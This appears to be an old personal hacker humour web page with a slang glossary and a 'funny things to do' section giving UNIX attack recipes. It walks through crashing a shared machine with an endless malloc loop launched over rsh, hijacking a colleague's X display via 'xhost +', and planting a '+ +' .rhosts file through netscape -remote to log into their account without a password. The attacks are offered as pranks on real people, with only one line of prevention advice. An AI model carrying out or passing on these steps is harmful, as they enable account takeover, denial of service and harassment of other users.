We left here a few stuff we either found on the net, or things we thought anybody should know...
A collection of stupid animated gifs :
(We really love him }-)
or Allways look cool
Diz sheep iz so funny
A collection of stupid terms :
downpatching : This means to get something down form the net.
dumping : This can mean to get someone's account.
Stalling or "torching" : Taking the control over someone's computer,
and bringing it to his knees.
Intensive swarfing : Taking control over someone's display, and displaying
some strange stuff...
Oul oulding: This is a future technology, held by aliens and brought into light
by those to fuckin' FBI agents, but nobody really knows what it could be
used for...
Funny things to do :
Stalling (or torching) : Common UNIX systems (doesn't work on LINUX) have a
very studip system for managing the system resources. Any program can
thereby take control over the system :
Let us suppose U have access on a machine, lamz ,write a small program,
like this one :
main() {while (1) malloc(200);}
and execute it in background with an rsh (
rsh -n lamz
progname
)Wait a few minutes (powerfull servers take only a few seconds ;-) and see...
Preparing attacks (UNIX) : Let us suppose U know a Deep-Ass, try to find a
good moment, to get on his keyboard. Just make his display accessible
(by a
xhost +
). The first step is to set Ur display to his, by asetenv DISPLAY lamz:0 and then, try one of following :
Intensive swarfing : Now, U have gained control over his display,
thus U can either let things appear or disappear on his
screen... U can now call any program you want (like
xv
,
netscape
or whatever else), it will appear on his screen.To make windows disappear, use first
xlsclients
, that willshow U the actual windows, and their id.
xlskill
id
willdestroy the window id.
Dumping : X-Windows has a very deep-hole ;-), in fact, U'll have seen
most of the Deep-Asses allways have a netscape opened. What
nobody knows, is that netscape (like any good UNIX software)
can take thousands of parameters... and they're cool !
First, create somewhere a file that only contains + +
Now, once U've gained someone's display (see above),
type these commands :
netscape -noraise -remote "openURL(http://
full filename
)"
netscape -noraise -remote "saveAs(
full lamz path
/.rhosts)"
netscape -noraise -back
Now, U can access his account with typing
(but it's forbidden ;-)
rlogin
anymachine
-l
lamz
U won't be asked for a password...
A good way to prevent this is to create Urself such a file
containing garbage (binary etc.)
This page is maintained by D-BIL